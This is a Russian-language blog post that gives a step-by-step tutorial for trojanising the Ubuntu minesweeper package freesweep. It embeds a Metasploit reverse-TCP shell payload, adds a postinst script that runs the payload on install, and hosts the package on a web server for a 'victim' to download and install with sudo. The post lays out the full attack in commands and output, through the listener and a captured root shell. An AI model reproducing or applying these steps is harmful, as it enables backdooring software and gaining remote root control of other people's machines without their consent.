Создаём троян для системы Линукс

Отмечу что данная штука может заработать, а может и не заработать. Почему ? Потому-что это Линукс !

Таким образом с целью того, чтобы показать, что атаки на «стороне клиента» имеются не только лишь под Windows, мы станем пользоваться Metasploit с целью формирования Ubuntu deb пакета, Для того чтобы обзавестись shell в Linux.



Что будет делать троян:

Троян представляет собой игру под линукс, как только жертва установит и начнет играть в скаченную игру, мы получим Shell !

Отличное видео выступиления Redmeat_uk демонстрации этой техники, вы можете увидеть на http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx



Сначала необходимо загрузить пакет, который мы собираемся «заразить» и перенести его во временный рабочий каталог. В нашем примере мы будем использовать пакет freesweep, текстовая версия Mine Sweeper.

Итак конструируем трояна:

Через консоль вводим следующие команды:

1)Команда: [email protected]:/pentest/exploits/framework3# apt-get –download-only install freeswee

Ответ:
Reading package lists… Done
Building dependency tree
Reading state information… Done
…snip…

2)Теперь переносим пакет во временный каталог следущими командами:

[email protected]:/pentest/exploits/framework3# mkdir /tmp/evil
[email protected]:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
[email protected]:/pentest/exploits/framework3# cd /tmp/evil/
[email protected]:/tmp/evil#

3) Далее, нам необходимо извлечь пакет в рабочую директорию и создать директорию DEBIAN для добавления наших дополнительных «возможностей».

[email protected]v-bt4-pre:/tmp/evil# dpkg –xfreesweep_0.90-1_i386.debwork
[email protected]:/tmp/evil# mkdir work/DEBIAN

4) В директории «DEBIAN», создайте файл с именем «control», который содержит следующее:

[email protected]:/tmp/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display – in Linux console, in an xterm, and in
most text-based terminals currently in use.

5) Нам также необходимо создать после установочный скрипт, который задаст исполняющие права на наши бинарные файлы. В директории «DEBIAN», мы создадим файл с именем «postinst», который содержит следующее:

[email protected]:/tmp/evil/work/DEBIAN# cat postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

6) Теперь создадим наше вредоносное содержимое. Мы будем использовать реверс-шелл бэк-коннекта для подключения к нашей машине под названием «freesweep_scores»:

Команда:
[email protected]:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores

Ответ
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443

7) Далее сделаем пост-установочный скрипт исполняемым и соберем наш новый пакет. Файл пакета будет называться «work.deb». Изменим его имя на freesweep.deb и скопируем пакет в корневой каталог нашего веб-сервера.

Команды:
[email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst
[email protected]:/tmp/evil/work/DEBIAN# dpkg-deb –build /tmp/evil/work

Ответ:
dpkg-deb: building package `freesweep’ in `/tmp/evil/work.deb’.

Команды:
[email protected]:/tmp/evil# mv work.deb freesweep.deb
[email protected]:/tmp/evil# cp freesweep.deb /var/www/

В общем-то и всё теперь как юзать:

1) Для начала запустим веб сервер Apache:

[email protected]:/tmp/evil# /etc/init.d/apache2 start

2) Запустим модуль Metasploit multi/handler для ожидания входящего соединения:

Команда:
[email protected]:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E

Ответ:
[*] Please wait while we load the module tree…
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

3) Нашу жертву под Ubuntu, мы должны убедить скачать и установить deb пакет с новой игрой:

На компе жертвы установить можно, например так, вводим команды:

[email protected]:~$ wget http://192.168.1.101/freesweep.deb
[email protected]:~$ sudo dpkg -i freesweep.deb

4) Как только жертва установит и начнет играть в скаченную игру, мы получим shell:

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)
ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
…snip…
hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)

RuCoreNET - лучшее для вас!


Поделись статьей с друзьями


130 просмотров


0 0 vote
Рейтинг статьи
Подписаться
Уведомление о
guest
0 Комментарий
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: